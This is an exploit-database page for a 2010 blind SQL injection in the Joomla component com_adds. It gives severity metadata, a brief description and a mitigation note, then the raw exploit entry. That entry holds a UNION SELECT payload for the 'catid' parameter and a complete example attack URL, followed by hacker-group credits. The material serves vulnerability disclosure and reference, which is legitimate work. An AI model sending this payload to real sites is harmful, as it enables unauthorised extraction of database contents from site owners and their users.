header-logo
Suggest Exploit
vendor:
com_adds
by:
DevilZ TM
7,5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: com_adds
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component com_adds Blind SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable parameter 'catid' in the URL. The query will be executed in the backend database, allowing the attacker to extract data from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Sanitize user input and use parameterized queries.
Source

Exploit-DB raw data:

# Title : Joomla Component com_adds Blind SQL Injection Vulnerability
# Author: DevilZ TM
# Data  : 2010-03-28

[~]######################################### InformatioN #############################################[~]
 
[~] Title     : Joomla Component com_adds Blind SQL Injection Vulnerability
[~] Author    : DevilZ TM By D3v1l
[~] Homepage  : http://www.DEVILZTM.com
[~] Email     : Expl0it@DevilZTM.Com
[~] Contact   : D3v1l.blackhat@yahoo.com
 
[~]#########################################   ExploiT   #############################################[~]
 
[~] Vulnerable File :
 
http://127.0.0.1/index.php?option=com_adds&action=view&catid=[Blind SQL]
 
[~] ExploiT         :
 
12+AND+1=0+UNION+SELECT+1,2--
 
[~] Example         :
 
http://127.0.0.1/index.php?option=com_adds&action=view&catid=12+AND+1=0+UNION+SELECT+1,2--

  
[~]######################################### ThankS To ... ############################################[~]
 
[~] Special Thanks To My Best FriendS :
 
Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
 
[~] IRANIAN Young HackerZ
 
[~]#########################################   FinisH :D   #############################################[~]

Navigation

Suggest Exploit

Services By CQR